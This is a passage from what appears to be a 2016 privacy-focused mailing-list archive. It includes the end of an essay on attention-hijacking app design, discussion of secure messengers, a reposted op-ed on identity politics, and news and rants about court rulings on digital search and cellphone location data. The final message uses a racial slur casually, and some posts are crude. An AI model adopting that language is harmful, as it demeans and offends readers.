choice/ to invite you, when in reality, they likely unconsciously responded to LinkedIn’s list of suggested contacts. In other words, LinkedIn turns your/unconscious impulses/ (to “add” a person) into new social obligations that millions of people feel obligated to repay. All while they profit from the time people spend doing it. Imagine millions of people getting interrupted like this throughout their day, running around like chickens with their heads cut off, reciprocating each other — all designed by companies who profit from it. Welcome to social media. After accepting an endorsement, LinkedIn takes advantage of your bias to reciprocate by offering *four* additional people for you to endorse in return. Imagine if technology companies had a responsibility to minimize social reciprocity. Or if there was an “FDA for Tech” that monitored when technology companies abused these biases? *Hijack #6: Bottomless bowls, Infinite Feeds, and Autoplay* YouTube autoplays the next video after a countdown Another way to hijack people is to keep them consuming things, even when they aren’t hungry anymore. How? Easy. /Take an experience that was bounded and finite, and turn it into a bottomless flow/ /that keeps going/. Cornell professor Brian Wansink demonstrated this in his study showing you can trick people into keep eating soup by giving them a bottomless bowl that automatically refills as they eat. With bottomless bowls, people eat 73% more calories than those with normal bowls and underestimate how many calories they ate by 140 calories. Tech companies exploit the same principle. News feeds are purposely designed to auto-refill with reasons to keep you scrolling, and purposely eliminate any reason for you to pause, reconsider or leave. It’s also why video and social media sites like Netflix, YouTube or Facebook /autoplay/ the next video after a countdown instead of waiting for you to make a conscious choice (in case you won’t). A huge portion of traffic on these websites is driven by autoplaying the next thing. Facebook autoplays the next video after a countdown Tech companies often claim that “we’re just making it easier for users to see the video /they want/ to watch” when they are actually serving their business interests. And you can’t blame them, because increasing “time spent” is the currency they compete for. Instead, imagine if technology companies empowered you to /consciously bound your experience /to align with what would be “time well spent ” for you. Not just bounding the /quantity /of time you spend, but the /qualities/ of what would be “time well spent.” Hijack #7: Instant Interruption vs. “Respectful” Delivery Companies know that messages /that interrupt people immediately are more persuasive at getting people to respond /than messages delivered asynchronously (like email or any deferred inbox). Given the choice, Facebook Messenger (or WhatsApp, WeChat or SnapChat for that matter) would /prefer to design their messaging system to/ /interrupt recipients immediately (and show a chat box) /instead of helping users respect each other’s attention. In other words, *interruption is good for business*. It’s also in their interest to heighten the feeling of urgency and social reciprocity. For example, Facebook automatically /tells the sender when you “saw” their message, instead of letting you avoid disclosing whether you read it/ (“now that you know I’ve seen the message, I feel even more obligated to respond.”) By contrast, Apple more respectfully lets users toggle “Read Receipts” on or off. The problem is, maximizing interruptions in the name of business creates a tragedy of the commons, ruining global attention spans and causing billions of unnecessary interruptions each day. This is a huge problem we need to fix with shared design standards (potentially, as part of Time Well Spent ). Hijack #8: Bundling Your Reasons with Their Reasons Another way apps hijack you is by taking /your reasons/ for visiting the app (to perform a task) and /make them inseparable from the app’s business reasons/ (maximizing how much we consume once we’re there). For example, in the physical world of grocery stories, the #1 and #2 most popular reasons to visit are pharmacy refills and buying milk. But grocery stores want to maximize how much people buy, so they put the pharmacy and the milk at the back of the store. /In other words, they make the thing customers want (milk, pharmacy) inseparable from what the business wants./ If stores were /truly organized to support people/, they would put the most popular items in the front . Tech companies design their websites the same way. For example, when you you want to look up a Facebook event happening tonight (your reason) the Facebook app doesn’t allow you to access it without first landing on the news feed (their reasons), and that’s on purpose. /Facebook wants to convert every reason you have for using Facebook, into their reason which is to maximize the time you spend consuming things/. In an ideal world, apps would always give you a /direct way/ to get what you want /separately/ from what they want. Imagine a digital “bill of rights” outlining design standards that forced the products used by billions of people to support empowering ways for them to navigate toward their goals. *Hijack #9: Inconvenient Choices* We’re told that it’s enough for businesses to “make choices available.” * “If you don’t like it you can always use a different product.” * “If you don’t like it, you can always unsubscribe.” * “If you’re addicted to our app, you can always uninstall it from your phone.” Businesses naturally /want to make the choices they want you to make easier, and the choices they don’t want you to make harder./ Magicians do the same thing. You make it easier for a spectator to pick the thing you want them to pick, and harder to pick the thing you don’t. For example, NYTimes.com lets you “make a free choice” to cancel your digital subscription. But instead of just doing it when you hit “Cancel Subscription,” they /send you an email with information on how to cancel your account by calling a phone number/ that’s only open at certain times. NYTimes claims it’s giving a free choice to cancel your account Instead of viewing the world in terms of /availability of choices/, we should view the world in terms of /friction required to enact choices/. Imagine a world where choices were labeled with how difficult they were to fulfill (like coefficients of friction) and there was an FDA for Tech that labeled these difficulties and set standards for how easy navigation should be. Hijack #10: Forecasting Errors, “Foot in the Door” strategies Facebook promises an easy choice to “See Photo.” Would we still click if it gave the true price tag? Lastly, apps can exploit people’s inability to forecast consequences of a click. People don’t intuitively forecast the /true cost/ /of a click /when it’s presented to them. Sales people use “foot in the door” techniques by asking for a small innocuous request to begin with (“just one click to see which tweet got retweeted”) and escalate from there (“why don’t you stay awhile?”). Virtually all engagement websites use this trick. Imagine if web browsers and smartphones, the gateways through which people make these choices, were truly watching out for people and helped them forecast the consequences of clicks (based on real data about what it actually costs most people?). That’s why I add “Estimated reading time” to the top of my posts. When you put the “true cost” of a choice in front of people, you’re treating your users or audience with dignity and respect. In a Time Well Spent internet, choices could be framed in terms of projected cost and benefit, so people were empowered to make informed choices by default, not by doing extra work. TripAdvisor uses a “foot in the door” technique by asking for a single click review (“How many stars?”) while hiding the three page survey of questions behind the click. Summary And How We Can Fix This Are you upset that technology hijacks your agency? I am too. I’ve listed a few techniques but there are literally thousands. Imagine whole bookshelves, seminars, workshops and trainings that teach aspiring tech entrepreneurs techniques like this. They exist. The ultimate freedom is a free mind, and we need technology that’s on our team to help us live, feel, think and act freely. We need our smartphones, notifications screens and web browsers to be exoskeletons for our minds and interpersonal relationships that put our values, not our impulses, first. People’s time is valuable . And we should protect it with the same rigor as privacy and other digital rights. (*) Tristan Harris /- Ex-Design Ethicist & Product Philosopher @ Google, former CEO of Apture (acquired by Google), dabbler in Behavioural Economics, Design and Persuasion.//Tristan Harris was Product Philosopher at Google until 2016 where he studied how technology affects a billion people’s attention, well-being and behaviour. For more resources on Time Well Spent, see //// /http://timewellspent.io///. / / --------------------- / *N.B.: ** **Robert Redford (79, “The Horse Whisperer”) does not have a smart-phone nor does he have a computer - for good reasons. The USAmerican actor and film-director was already declared once dead on social media at the onset of this year, but is very well, alive, an activist and kicking. *// /======== * * *Pro-active work to protect nature and human rights requires YOU to work with us* *Even if you have no possibility to be at the front-lines with us, please know we need independent funding.** * *PLEASE consider to contribute to ECOTERRA's work and trust fund. * ------------------- *ECOTERRA Intl.* /***SURVIVAL & FREEDOM for PEOPLE & NATURE*/ ----------------- Our full footer, being an essential, legal part of this dissemination, can be found at http://www.ecoterra.net/footer.htm - please read it at least once a month to see important security updates. ---------------------- ***ECOTERRA Intl. nodes:* Canaries - Cairns - Cairo - Calgary - Cape Town - Cassel - Cebu - Cork - Curitiba - London - Los Angeles - Nairobi - Roma - Paris - Reykjavik - Stuttgart - Wien - Vanuatu ECOTERRA - FIRST PEOPLES & NATURE FIRST! http://www.ecoterra-international.org 24 h EMERGENCY RESPONSE PHONE LINE: +254-714-747-090 Become a pro-ative-member of *fPcN-interCultural* (//write to //Friends of Peoples close to Nature via collective at fpcn-global.org) / /or of our Marine Group: http://www.ecop.info/ From grarpamp at gmail.com Sun May 29 12:27:18 2016 From: grarpamp at gmail.com (grarpamp) Date: Sun, 29 May 2016 15:27:18 -0400 Subject: What happened to Pond? Message-ID: "*Pond is in stasis*, and has been for several years. I hope that some of the ideas prove useful in the future, but people should use something [better polished and reviewed](https://whispersystems.org). I've no plans to shutdown down the default server, but **new users should look elsewhere**." -- agl at github From grarpamp at gmail.com Sun May 29 19:51:39 2016 From: grarpamp at gmail.com (grarpamp) Date: Sun, 29 May 2016 22:51:39 -0400 Subject: What happened to Pond? In-Reply-To: <574B49CD.1080204@riseup.net> References: <574B49CD.1080204@riseup.net> Message-ID: On 5/29/16, Mirimir wrote: > You need a telephone number to use that Whisper Systems stuff, right? Group Silent Text/Circle/Mail/Phone, BlackPhone, used to have standalone SMS app but they dropped it. Group Whisper TextSecure/Signal, RedPhone, (to lesser degree partner WhatsApp), did the same, but SMSSecure. They have beta desktop version as chrome app. https://eprint.iacr.org/2014/904.pdf Can always use any droid apps in emulator, such as ChatSecure. And XOR modulo some printable charset any legacy SMS you care to send. A number? AFAIK, yes, presumably depending if you went opensource self path or not. https://en.wikipedia.org/wiki/Signal_(software)#Limitations Phone numbers suck, which is why Pond, Ricochet, etc. > Setting up Pond servers isn't hard. A friend is working on a how-to. > > But then there's the Panda exchange server :( Mmm friends, and panda's, be seein ya soon. From grarpamp at gmail.com Sun May 29 19:56:16 2016 From: grarpamp at gmail.com (grarpamp) Date: Sun, 29 May 2016 22:56:16 -0400 Subject: What happened to Pond? In-Reply-To: References: <574B49CD.1080204@riseup.net> Message-ID: > SMSSecure https://silence.im/ https://github.com/SilenceIM/Silence From admin at pilobilus.net Tue May 31 05:52:59 2016 From: admin at pilobilus.net (Steve Kinney) Date: Tue, 31 May 2016 08:52:59 -0400 Subject: There's no point in being a victim In-Reply-To: References: Message-ID: <574D892B.9060104@pilobilus.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 05/31/2016 07:10 AM, Zenaan Harkness wrote: > http://blogs.news.com.au/heraldsun/miss-judgement/index.php/heraldsun/ comments/victimhood_does_not_equal_moral_superiority/ > > There's no point in being a victim Rita Panahi 2016-05-30 > HeraldSun.com.au > > Where do you rank in the Oppression Olympics? Are you floundering > at the bottom of the table among the privileged white, Christian, > heteronormative cisgender males with no moral authority to speak > on any issue? Or are you going for gold as a transgendered > pansexual Muslim woman of colour? This little polemic illustrates a classic political warfare technique I call "rebel as you are told." One of the most effective ways to combat social/political reform movements is to create and promote front groups that co-opt movements and factions with legitimate grievances by presenting vindictive, divisive, self defeating versions of same to the public. This method is expensive but worth it, because when it works an independent, self sustaining, self funding and self defeating fad displaces a potentially effective reform movement - and whoever is profiting from the abuses of power the original reform movement sought to remove can rest easy for a decade or more. I believe this tactic evolved from the simple black propaganda technique of creating bogus advocates to stand up strawmen in the name of various real-life reform campaigns. Someone noticed that these strawmen can be taken at face value by naive people whose interests it pretends to speak for, and ran with it. -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.22 (GNU/Linux) iQEcBAEBAgAGBQJXTYkrAAoJEECU6c5XzmuqwREIAJfha+uz0OkJk4nAkNiSBj30 1DomI3HJY2Z9U0JLXLspcCn5hDwMqt0SZIClFW7E2tjt1uhzNqVGpxxl86zCMDBm r2Rdft3VTakn+I8V6Kp5cxkp78QMADGrhW7eN7+Xq2KXa3Qtsp+QCIrbEBKa9UjW IPNkosAhFRrWiSnEJh2iSEyqKyJpiIB7dEcL/+sHSf/V4RNIjsxl/XgdwrK67fIH ETVetGmCAxktqo4IyBMnBk2r3vlbcbO0vzgWk1zWcTrteUTr7HZ8qmlIAMYFyHuz V3ogbpUCsFG4fT/mNcs8UY8q5600tO2kzi/0mQe3PorqmmtYxpDnKySFrD3EOfY= =1m2A -----END PGP SIGNATURE----- From zen at freedbms.net Tue May 31 04:10:07 2016 From: zen at freedbms.net (Zenaan Harkness) Date: Tue, 31 May 2016 11:10:07 +0000 Subject: There's no point in being a victim Message-ID: http://blogs.news.com.au/heraldsun/miss-judgement/index.php/heraldsun/comments/victimhood_does_not_equal_moral_superiority/ There's no point in being a victim Rita Panahi 2016-05-30 HeraldSun.com.au Where do you rank in the Oppression Olympics? Are you floundering at the bottom of the table among the privileged white, Christian, heteronormative cisgender males with no moral authority to speak on any issue? Or are you going for gold as a transgendered pansexual Muslim woman of colour? There was a time when a person’s status was determined by their birth; those fortunate enough to belong to the aristocracy were judged to be our moral and intellectual superiors. Now there’s a new and even more toxic pecking order that determines one’s acceptability and authority to speak on a range of issues. The new aristocracy is determined by one’s victimhood status; the more grievance points you accumulate, the greater your mandate to preach. Of course, if you don’t identify as a victim then your oppression ranking plummets to Anglo-male depths, but if you play the game right, you can use your grievance status to score plum roles as well as dodge all responsibility if you happen to fail miserably. One popular tactic among the victimhood brigade is the refusal to accept any criticism that comes from those who are of a different race, religion, gender, sexuality or whatever else differentiates you. Men should not speak about feminism, whites should butt out of black or ethnic debates, and non-Muslims should never pass judgment on Islam. Last week soon-to-be-retired Senator Nova Peris rejected the opinions of those who don’t share her oppression ranking. “Until you are an Aboriginal person, don’t criticise me,” she said. Really? Can I play that card the next time I receive unhinged abuse from the always bitter and outraged feminist frightbats who are invariably middle-class white women? From now on my standard response to any and all criticism will be: “Unless you are an American-born Persian Australian, don’t judge me.” Let's remember that Peris isn't some disempowered victim; indeed she's been treated better than most in her short political career. Allegations that Peris used taxpayer money to carry out an extramarital affair would have ended most political careers but she survived and earned a few extra grievance points by painting herself as the victim. While working for the Australian Institute of Aboriginal and Torres Strait Islander Studies, Peris was involved in a decision to bring her lover, Olympian Ato Boldon, to Australia for a 10-day tryst interrupted by a few athletic workshops. However when the scandal was revealed, and again last week, there was no shortage of media pundits eager to characterise any criticism of Peris as racially motivated. We see the same simplistic arguments put forward claiming only indigenous people are entitled to an opinion on Australia Day, or Invasion Day, or whenever matters concerning the indigenous community are debated. How absurd to think that all people of a particular race or religion share the same values and viewpoints and will have their “side” adequately covered by an ethnically-appropriate representative. Those who demand that every member of a particular minority group think and vote the same way are guilty of the sort of closeminded prejudice that the Left used to rail against. It's not just a local phenomenon - Egyptian feminist Mona Hathaway, a favourite of the Q&A set, recently demanded that only Muslim women speak about the religion's many problems, particularly with veiling. “If you're white/ not a Muslim woman: shut up and listen to us, Muslim women,” she tweeted. Victimhood does not equal moral superiority, particularly when in your eagerness to establish your victimhood status you ignore real victims. Western feminists who turn their back on oppressed women while getting worked up about non-issues such as gendered toys and “sexist air conditioners” are not noble warriors, merely trolls. Ordinarily I'd be the type of minority the average Leftie would be delighted to embrace given my many oppression points: woman of colour, Middle Eastern refugee, atheist, single mother - if I was also a lesbian with a disability I'd have hit the diversity jackpot. And that's part of the problem. Many progressives consider diversity a disability to be overcome. The victimhood they seek signifies for them a struggle that is often entirely in their own minds. My failure to see my ethnic origin as some sort of handicap is deemed unacceptable. The fact that I don't view Australia as an inherently racist country ruled by monstrous patriarchy riles them even more. Unlike most Western feminists who have abandoned their sisters in the Muslim world, I won't stay silent about the systematic subjugation of women in the name of Islam. That I won't frame my opinions in a manner that pushes daft social justice agendas that are short on justice and high on propagating falsehoods is the final deal breaker. All of that combines to negate any oppresion points I've accumulated and casts me as an enemy of your average Leftist, or progressive as they prefer to be called. Those people believe that if you don't subscribe to their dippy worldview you're suffering from internal misogyny and racism. That's intellectually vacuous and it's at the heart of the social justice activism that's taken hold of much of academia. Is it any surprise universities are increasingly banning free speech and creating “safe spaces” to spare their delicate student populations from the only diversity they hate - the diversity of opinion? Identity politics that portrays victimhood as something to be lauded is counter-productive and divisive. Only a bigot would dismiss someone's opinion based on their race, religion, gender or sexuality. rita DOT panahi AT news.com.au From anthony at cajuntechie.org Tue May 31 09:19:29 2016 From: anthony at cajuntechie.org (Anthony Papillion) Date: Tue, 31 May 2016 11:19:29 -0500 Subject: All your disk image are (forever) belong to us, says appeals court In-Reply-To: References: Message-ID: <207f3121-0306-79c1-3289-f424f0a65edf@cajuntechie.org> On 5/31/2016 10:41 AM, Александр wrote: > *All your disk image are belong to us, says appeals court > Court says your files are ripe for seizure—Fourth Amendment doesn't apply.* > /by David Kravets - May 31, 2016/ > > http://arstechnica.com/tech-policy/2016/05/feds-can-keep-your-hard-drives-indefinitely-and-search-them-too/?utm_source=howtogeek&utm_medium=email&utm_campaign=newsletter > > The government can prosecute and imprison people for crimes based on > evidence obtained from their computers—even evidence retained for years > that was outside the scope of an original probable-cause search warrant, > a US federal appeals court has said in a 100-page opinion paired with a > blistering dissent. THIS is the kind of shit that the American people need to start pushing back against. This is outright abuse. It's the government simply saying "We own your ass and there is nothing you can do about it". But will they? Of course not! They are too busy watching our mindless television and focusing on what Kimye is doing this week. What will it take for us to finally wake up and fight back? A total suspension of the Constitution and a revocation of our rights? Disgusting. Anthony From afalex169 at gmail.com Tue May 31 08:41:22 2016 From: afalex169 at gmail.com (=?UTF-8?B?0JDQu9C10LrRgdCw0L3QtNGA?=) Date: Tue, 31 May 2016 18:41:22 +0300 Subject: All your disk image are (forever) belong to us, says appeals court Message-ID: *All your disk image are belong to us, says appeals courtCourt says your files are ripe for seizure—Fourth Amendment doesn't apply.* *by David Kravets - May 31, 2016* http://arstechnica.com/tech-policy/2016/05/feds-can-keep-your-hard-drives-indefinitely-and-search-them-too/?utm_source=howtogeek&utm_medium=email&utm_campaign=newsletter The government can prosecute and imprison people for crimes based on evidence obtained from their computers—even evidence retained for years that was outside the scope of an original probable-cause search warrant, a US federal appeals court has said in a 100-page opinion paired with a blistering dissent. The 2nd US Circuit Court of Appeals ruled that there was no constitutional violation because the authorities acted in good faith when they initially obtained a search warrant, held on to the files for years, and built a case unrelated to the original search. The case posed a vexing question—how long may the authorities keep somebody's computer files that were obtained during a search but were not germane to that search? The convicted accountant said that only the computer files pertaining to his client—who was being investigated as part of an Army overbilling scandal—should have been retained by the government during a 2003 search. All of his personal files, which eventually led to his own tax-evasion conviction, should have been purged, he argued. But the appeals court said the authorities' behavior was acceptable and didn't reach the constitutional question of whether the Fourth Amendment rights were breached for accountant Stavros Ganias, who was sentenced to two years in prison. That's because three years after the original search of the accountant's files in connection to the Army scandal, Connecticut authorities got another search warrant for Ganias' own tax files that were already in the government's possession, the appeals court ruled in a 12-1 decision Friday written by Judges Debra Ann Livingston and Gerard Lynch. Ganias had subsequently deleted those files from his hard drives after the government had imaged them, according to court records: Defendant-Appellant Stavros Ganias appeals from a judgment of the United > States District Court for the District of Connecticut (Thompson, J.) > convicting him, after a jury trial, of two counts of tax evasion in > violation of 26 U.S.C. § 7201. He challenges his conviction on the ground > that the Government violated his Fourth Amendment rights when, after > lawfully copying three of his hard drives for off-site review pursuant to a > 2003 search warrant, it retained these full forensic copies (or “mirrors”), > which included data both responsive and non-responsive to the 2003 warrant, > while its investigation continued, and ultimately searched the > non-responsive data pursuant to a second warrant in 2006. Ganias contends > that the Government had successfully sorted the data on the mirrors > responsive to the 2003 warrant from the non-responsive data by January > 2005, and that the retention of the mirrors thereafter (and, by extension, > the 2006 search, which would not have been possible but for that retention) > violated the Fourth Amendment. He argues that evidence obtained in > executing the 2006 search warrant should therefore have been suppressed. > > We conclude that the Government relied in good faith on the 2006 warrant, > and that this reliance was objectively reasonable. Accordingly, we need not > decide whether retention of the forensic mirrors violated the Fourth > Amendment, and we AFFIRM the judgment of the district court. > *The case is clearly nuanced, but it has huge ramifications for the public because many people keep all of their papers and effects co-mingled on their hard drives.* In his 40-page dissent, Judge Denny Chin blasted the majority opinion and said the authorities wrongly seized files from Ganias that were unrelated to the Army overbilling investigation. "The government did precisely what the Fourth Amendment forbids: it entered Ganias' premises with a warrant to seize certain papers and indiscriminately seized—and retained—all papers instead," Chin wrote. This is not the first time the appeals court entertained the case. Last year, the court sided (PDF) with Ganias in a 2-1 ruling. But the government asked for the full appeals court to rehear the case en banc, and the court agreed to do so with all 13 judges. The court's original ruling for Ganias said investigators had a right to image Ganias' three hard drives at the center of the Army overbilling dispute. But the majority concluded that the law did not allow "officials executing a warrant for the seizure of particular data on a computer to seize and indefinitely retain every file on a computer for use in future criminal proceedings." Ganias' lawyer, Stanley Twardy, urged the government to set aside his client's conviction. *"The seizure and two-and-a-half year retention of every file on Ganias' computers violated the Fourth Amendment,"* Twardy ​​ wrote . (PDF) He told the New York-based appeals court that "at a minimum the Fourth Amendment requires prompt completion of an off-site review and return of files outside the warrant's scope." The government countered, "Consistent with the Fourth Amendment, the government may obtain a search warrant for nearly any person, place, or thing if the government establishes probable cause for the search and did not engage in an illegal seizure of the item to be searched," Assistant US Attorney Sandra Glover wrote in the government's ​filing -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 6845 bytes Desc: not available URL: From grarpamp at gmail.com Tue May 31 20:59:58 2016 From: grarpamp at gmail.com (grarpamp) Date: Tue, 31 May 2016 23:59:58 -0400 Subject: All your ... are (forever) belong to us, says (your Gov / Corp) Message-ID: On 5/31/16, Anthony Papillion wrote: > What will it take for us to finally wake up and fight back? A total > suspension of the Constitution and a revocation of our rights? Americans gave all their rights up moments after they successfully revolted against the Brits... by giving them, and all the rest of their interests, to their new Government, Oligarchs, System, etc for supposed benevolent care. And they just got done proving minutes before that idea never works in the end. Fools. Now shit is once again raping them from all three branches of their government and business combined. Oopsie. Yet more news from the stupid-comes-full-circle dept... https://yro.slashdot.org/story/16/05/31/213259/us-court-says-no-warrant-needed-for-cellphone-location-data http://www.reuters.com/article/us-usa-court-mobilephones-idUSKCN0YM2CZ Police do not need a warrant to obtain a person's cellphone location data held by wireless carriers, a U.S. appeals court ruled on Tuesday, dealing a setback to privacy advocates. The full 4th U.S. Circuit Court of Appeals in Richmond, Virginia, voted 12-3 that the government can get the information under a decades-old legal theory that it had already been disclosed to a third party, in this case a telephone company. The ruling overturns a divided 2015 opinion from the court's three-judge panel and reduces the likelihood that the Supreme Court would consider the issue. The decision arose from several armed robberies in Baltimore and Baltimore County, Maryland, in early 2011, leading to the convictions of Aaron Graham and Eric Jordan. The convictions were based in part on 221 days of cellphone data investigators obtained from wireless provider Sprint, which included about 29,000 location records for the defendants, according to the appeals court opinion. From grarpamp at gmail.com Tue May 31 23:27:23 2016 From: grarpamp at gmail.com (grarpamp) Date: Wed, 1 Jun 2016 02:27:23 -0400 Subject: Your money in the bank ... they don't have it. Message-ID: Dis ma main nigga... https://www.youtube.com/watch?v=PYgD4vO1wnY https://www.youtube.com/watch?v=oXgli0xQ108 https://www.youtube.com/watch?v=WAhUbnVv6Zc Like, comment, share, changetip... bruhs. bitcoin:1QKBY5Cb8mt6V3JJ9owYUxqcJ8iKa7Q3gM